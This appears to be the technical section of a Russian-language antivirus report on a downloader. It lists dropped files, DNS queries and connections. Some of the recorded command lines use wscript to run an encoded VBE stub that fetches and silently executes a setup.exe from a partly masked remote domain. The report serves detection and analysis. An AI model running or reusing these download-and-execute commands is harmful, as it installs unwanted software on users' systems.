Техническая информация
- %TEMP%\stb1.tmp\setup.exe -i 84ddcc2ccde74634a657c7d749582b91 -p BscscnPB /S
- %TEMP%\stb1.tmp\setup.exe (загружен из сети Интернет)
- <SYSTEM32>\ping.exe 127.0.0.1 -n 2
- <SYSTEM32>\wscript.exe /B "%TEMP%\stb2.tmp\stub.vbe" "http://up#####.batbeathit.com/install.aspx?b=#########" "%TEMP%\stb1.tmp\setup.exe" ""%TEMP%\stb1.tmp\setup.exe" -i 84ddcc2ccde74634a657c7d749582b91 -p BscscnPB /S" "http://up#####.batbeathit.com/?vn#####################################################################################################################################################################################################" 0 1
- %TEMP%\stb1.tmp\setup.exe
- %TEMP%\stb2.tmp\stub.vbe
- %TEMP%\stb1.tmp\setup.exe
- %TEMP%\stb2.tmp\stub.vbe
- 'up#####.batbeathit.com':80
- up#####.batbeathit.com/?vn###################################################################################################################################################################################################
- up#####.batbeathit.com/install.aspx?b=#########
- DNS ASK up#####.batbeathit.com
- '<IP-адрес в локальной сети>':1035